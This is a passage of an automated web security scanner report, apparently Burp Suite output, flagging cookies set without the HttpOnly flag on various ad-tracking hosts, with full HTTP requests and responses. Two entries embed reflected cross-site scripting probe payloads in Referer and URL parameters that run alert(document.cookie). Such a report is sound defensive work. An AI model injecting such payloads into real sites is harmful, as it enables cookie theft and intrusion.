Host:   http://clk.redcated
Path:   /CNT/go/286609711/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353204-3934536; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B03CF75FE18B4C4488D98A18A160243C; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7b4; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:43 GMT
Connection: close


17.127. http://clk.redcated/CNT/go/287065754/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /CNT/go/287065754/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353207-3943143; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=3467FF0EC8A04BA6ADED05C9CB0F7837; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7b7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:46 GMT
Connection: close


17.128. http://clk.redcated/CNT/go/299297287/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /CNT/go/299297287/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CNT/go/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344744-9189356; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=ADE9FC21333E46488D7A7ABFE892B219; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a8; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:43 GMT
Connection: close


17.129. http://clk.redcated/NFX/go/297941249/direct/01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /NFX/go/297941249/direct/01/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /NFX/go/297941249/direct/01/ HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.netflix.com/opdply?mqso=80028841
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344741-9183539; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=911C5A9886C74D1D85E6D49FC8A33620; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c4e; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf3b0a8/1c4e/11c23901/bab9/4d44a6a5; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:40 GMT
Connection: close


17.130. http://clk.redcated/ULA/go/296652509/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /ULA/go/296652509/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ULA/go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3979227; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=27C92A747D6B4A87B8366284DD8E4677; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:53 GMT
Connection: close


17.131. http://clk.redcated/go/286026710/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/286026710/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286026710/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.ishares.com/home.htm&c=MSN
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3980097; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=2652D8E3C448492EBAA5519D4E847438; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=4bd5098/1c5b3/110c6bd6/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:53 GMT
Connection: close


17.132. http://clk.redcated/go/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/286609711/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/286609711/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1&source=ECbc0000000WIP00O&GUID=64701E1B-0B1A-4566-86D1-3CFA683F0759
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353255-3938625; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=9B933D979CFB4CC081B176EF97E8AAD9; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=a0b6/1a43a; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bf2ec3a/1a43a/1115512f/a0b6/4d44c7e7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:35 GMT
Connection: close


17.133. http://clk.redcated/go/287065754/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/287065754/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/287065754/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.wireless.att.com/cell-phone-service/cell-phones/motorola.jsp?startFilter=false&feacondition=newphone&source=ECWD000000000000O
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353257-3947053; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=CDB74D90C77343EFBA0AEB977000E321; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/25d1; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=bab2264/25d1/111c469a/bab9/4d44c7e9; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:36 GMT
Connection: close


17.134. http://clk.redcated/go/296652509/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /go/296652509/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/296652509/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296350513-3979647; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=93E807CC859C4B04A5E7B8BADD66DD24; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1b1dd; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=3cb5efe/1b1dd/11ae8edd/bab9/4d44bd31; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 01:21:52 GMT
Connection: close


17.135. http://clk.redcated/goiframe/184054348/262582811/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /goiframe/184054348/262582811/direct/01

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/184054348/262582811/direct/01 HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://www.sharebuilder.com/affiliates/?PC=sb&SID=520062934056594&MGDURL=Web%2Fwelcome%2Fwp%2Findex.htm&cmpid=10101414
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353210-3953580; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=C399BF76ECC4498AABC770564CEE637F; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c72; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=af8724c/1c72/fa6b21b/bab9/4d44c7ba; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:06:50 GMT
Connection: close


17.136. http://clk.redcated/goiframe/199711109/299297287/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.redcated
Path:   /goiframe/199711109/299297287/direct

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /goiframe/199711109/299297287/direct HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://attuverseoffers.com/page4/index.html?1
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296344745-9193135; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=B310B20DA83E464695664804CCAE6E71; expires=Wednesday, 17-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1a43a; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=be75985/1a43a/11d6ea07/bab9/4d44a6a9; expires=Monday, 28-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sat, 29 Jan 2011 23:45:45 GMT
Connection: close


17.137. http://context3.kanoodle.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://context3.kanoodle.com
Path:   /cgi-bin/context.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666 HTTP/1.1
Host: context3.kanoodle.com
Proxy-Connection: keep-alive
Referer: http://www.newsvine.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:05:02 GMT
Server: Barista/1.1-(eanhbg)
Connection: Close
Content-Length: 3242
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: vi_1.011=129639990201622008000000106049048; domain=.kanoodle.com; path=/; expires=Mon, 30-Jan-2012 15:05:02 GMT
Set-Cookie: fc_ms_1.3=AA; domain=.kanoodle.com; path=/; expires=Sun, 06-Feb-2011 15:05:02 GMT

document.write('<style type="text/css">.listing { background-color: #FFFFFF; font-size: ; font-family: ; width: 160; border: 1px solid #FFFFFF; padding-left: 5px; }.listing_title { cl
...[SNIP]...

17.138. http://conveu.admailtiser.com/st

Summary

Severity:   Information
Confidence:   Certain
Host:   http://conveu.admailtiser.com
Path:   /st

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /st?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601 HTTP/1.1
Host: conveu.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://www.reimage.com/lp/nhome/index.php?tracking=Neudesic69f18%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E602f708c63d&banner=&banner=728x90-1\&adgroup=direct&ads_name=direct&keyword=direct
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Sun, 30 Jan 2011 01:23:50 GMT
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: cicouid=cc7abda8-722d-4cd3-b76a-29b02a48647arcjRQOvWHnoil_sqd2OXzw; Domain=.admailtiser.com; Expires=Mon, 30-Jan-2012 01:23:50 GMT; Path=/
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Set-Cookie: ciconv0=6940311042157494960$8601-c1fe3893-3748-4f39-bb7c-f9bd561f5dc2; Domain=.admailtiser.com; Expires=Mon, 31-Jan-2011 01:23:50 GMT; Path=/
Location: http://srv.admailtiser.com/pix/master_pixel.js?cijs=1&cipid=8601&ttype=0&seg=86011&pixels=8601&cisd=seg
Content-Length: 0


17.139. http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d2/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.551781514659524 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/adchain.html?ZoneID=389&Task=Get&ifr=true&SiteID=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=2:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Sun, 29 Jan 2012 23:16:32 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "81ee0c62-82a5-4989a5416ab80"
Vary: Accept-Encoding
X-Varnish: 2233582304 2233582012
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=372
Expires: Sat, 29 Jan 2011 23:22:44 GMT
Date: Sat, 29 Jan 2011 23:16:32 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzCus
...[SNIP]...

17.140. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=1394&r=13&d=14&q=&$=&s=2&l=http%3A//atl.whitepages.com/adclick/CID%3D0000e376b2c762f700000000/relocate%3D&z=0.718691564630717 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; ZCBC=1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640|1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1; PI=h1037004Za883601Zc826000187,826000187Zs173Zt129; FFad=3:0:0:1:0:0; FFcat=929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:3:0:0:1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1394,2,14:929,286,14:826,187,14:951,11,14:826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=290
Expires: Sun, 30 Jan 2011 01:34:33 GMT
Date: Sun, 30 Jan 2011 01:29:43 GMT
Connection: close
Content-Length: 3345

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...

17.141. http://deals.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.redacted
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: deals.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:01 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=af553d4f97984ae69ffeb82fbcef5634; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=DAFE261BA5894DCFB4A71871ED1DEC9A; domain=.redacted; expires=Wed, 17-Aug-2011 23:46:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34160

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.142. http://dg.specificclick.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dg.specificclick.net
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?u=http%3A%2F%2Fwww.neudesicmediagroup.com%2FAdvertising.aspx%3Fsite%3DSilverlight2d710%2522%253balert(document.cookie)%2F%2F68483822cd8&r=http%3A%2F%2Fburp%2Fshow%2F21 HTTP/1.1
Host: dg.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.neudesicmediagroup.com/Advertising.aspx?site=Silverlight2d710%22%3balert(document.cookie)//68483822cd8
